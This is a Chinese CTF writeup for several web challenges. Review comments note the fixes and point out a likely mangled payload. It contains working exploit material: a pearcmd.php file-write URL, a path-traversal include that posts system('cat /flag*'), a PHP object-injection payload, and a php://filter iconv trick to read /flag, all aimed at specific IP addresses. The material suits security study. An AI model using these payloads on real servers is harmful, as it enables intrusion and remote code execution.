    var regx = new RegExp("(.{"+offset+"})");
    return this.replace(regx,"$1"+str);
};

// 1st test: from lastIndex 0, "lgg" matches; lastIndex becomes 3.
if(regex.test("lgg")){
    flag = flag.insetAt('N1Y',2);
}
// 2nd test: starts at 3 in a 3-character string — no match, lastIndex reset to 0.
if(regex.test("lgg")){
    flag = flag.insetAt("QC2",6);
}
// 3rd test: "yuelgg" from 0 matches at 3; lastIndex becomes 6.
if(regex.test("yuelgg")){
    flag = flag.insetAt('JiY',10);
}
// 4th test: starts at 6 — no match.
if(regex.test("yuelgg")){
    flag = flag.insetAt('C3Y',14);
}

// Result after the two successful insertions; base64-decode it for the flag.
let trueflag = flag;

run this code

echo c2N1Y3Rme2JiY2QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0= | base64 -d

简单的CMS

被编码问题坑惨了。。。。

http://114.117.187.56:12000/?+config-create+/&r=../../../../../../../../../../../usr/share/php/pearcmd&/<?=print(1);?>+/tmp/ktou.php

# 简单的CMS: the `r` parameter is included without restriction. The URL in
# the writeup first abuses the bundled pearcmd.php (config-create) to write
# /tmp/ktou.php; this script then includes that file via path traversal and
# posts PHP code in field "1". NOTE(review): the URL shown above writes
# `print(1)`, which would not evaluate the posted field — the line was
# probably mangled by the encoding trouble the author mentions; confirm what
# was really written. Fix: whitelist includable files and keep pearcmd.php
# out of the web root / disable register_argc_argv.
import requests
from base64 import *
url = "http://114.117.187.56:12000/"
r = requests.post(url, params={"r": '''../../../../../../../../tmp/ktou'''}, data = {"1":'''system("cat /flag*");'''})
print(r.text)

unserialize

# unserialize: PHP object injection — the `p` parameter is fed to
# unserialize(), so the client chooses the object's class and properties
# (here class A with kfc = "v_me_50"). NOTE(review): the string declares 2
# properties but lists only one; confirm this is what was actually sent.
# Fix: never unserialize untrusted data; exchange JSON instead (or at least
# restrict allowed_classes). The base64 import is unused.
import requests
from base64 import *
url = "http://114.117.187.56:11008/"
r = requests.post(url, params={"p": '''O:1:"A":2:{s:3:"kfc";s:7:"v_me_50";}'''})
print(r.text)

ezbypass

环境崩了。说下思路

http://43.142.108.183:8085/?url=php://filter/read=convert.iconv.UTF-16BE.UTF-32BE/resource=/flag
对返回的 base64 解码,去除所有 \x00 字节,就可以得到 flag 了。